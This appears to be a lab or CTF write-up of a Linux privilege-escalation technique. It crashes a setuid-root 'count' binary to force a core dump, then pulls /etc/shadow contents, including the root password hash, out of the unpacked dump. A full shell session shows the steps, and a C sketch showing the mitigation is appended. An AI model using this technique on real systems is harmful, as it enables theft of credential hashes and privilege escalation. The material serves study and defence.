Core Dump Technique

linux, privesc

Overview

An attacker can force a program to crash so that it generates a core dump, then read the data the program had buffered in memory (e.g. /etc/shadow) from that dump.

Environment

-rwsr-xr-x 1 root root 17824 Oct  7 10:03 count*
prctl(PR_SET_DUMPABLE, 1);
dasith@secret:/opt$ cat /proc/sys/fs/suid_dumpable
2
dasith@secret:/opt$ 

Steps

dasith@secret:/opt$ ./count 
Enter source file/directory name: /etc/shadow

Total characters = 1187
Total words      = 36
Total lines      = 36
Save results a file? [y/N]: 
dasith@secret:/opt$ ./count 
Enter source file/directory name: /etc/shadow

Total characters = 1187
Total words      = 36
Total lines      = 36
Save results a file? [y/N]: ^Z
[1]+  Stopped                 ./count
dasith@secret:/opt$ 
dasith@secret:/opt$ kill -SIGSEGV `pidof count`
dasith@secret:/opt$ fg
./count
Segmentation fault (core dumped)
dasith@secret:/opt$ ls -lrt /var/crash/
total 32
-rw-r----- 1 dasith dasith 28756 Dec 11 04:51 _opt_count.1000.crash
dasith@secret:/opt$ 
dasith@secret:/opt$ apport-unpack /var/crash/_opt_count.1000.crash /tmp/crash-report
dasith@secret:/opt$ strings /tmp/crash-report/CoreDump | grep root
root:$6$/0f5J.S8.u.dA78h$xSyDRhh5Zf18Ha9XNVo5dvPhxnI0i7D/uD8T5FcYgN1FYMQbvkZakMgjgm3bhtS6hgKWBcD/QJqPgQR6cycFj.:18873:0:99999:7:::
dasith@secret:/opt$ 
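
The mitigation side of the setup above, as an added example that is not from the original page or from the count binary: a counting routine that marks the process non-dumpable instead of calling prctl(PR_SET_DUMPABLE, 1), and wipes its read buffer before returning. The names disable_core_dumps, count_file and struct counts are assumptions made for this sketch.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/resource.h>

/* Hypothetical names for this sketch; not taken from the count binary. */
struct counts { long chars, words, lines; };

/* Mark the process non-dumpable; RLIMIT_CORE=0 is a second layer. 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit none = { 0, 0 };
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0) return -1;
    return setrlimit(RLIMIT_CORE, &none);
}

/* Count chars/words/lines, then wipe the buffer that held file contents. */
int count_file(const char *path, struct counts *out)
{
    char buf[4096];
    size_t n;
    int in_word = 0;
    FILE *fp = fopen(path, "r");
    if (fp == NULL) return -1;
    setvbuf(fp, NULL, _IONBF, 0);      /* avoid a stdio-owned copy of the data */
    memset(out, 0, sizeof *out);
    while ((n = fread(buf, 1, sizeof buf, fp)) > 0) {
        for (size_t i = 0; i < n; i++) {
            unsigned char c = (unsigned char)buf[i];
            out->chars++;
            if (c == '\n') out->lines++;
            if (isspace(c)) in_word = 0;
            else if (!in_word) { in_word = 1; out->words++; }
        }
    }
    explicit_bzero(buf, sizeof buf);   /* not optimised away, unlike memset */
    fclose(fp);
    return 0;
}

int main(int argc, char **argv)
{
    struct counts c;
    if (disable_core_dumps() != 0 || argc < 2 || count_file(argv[1], &c) != 0)
        return 1;
    printf("chars=%ld words=%ld lines=%ld\n", c.chars, c.words, c.lines);
    return 0;
}
```

With the dumpable flag at 0, the SIGSEGV from the steps above terminates the process without producing a crash report the invoking user can read.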
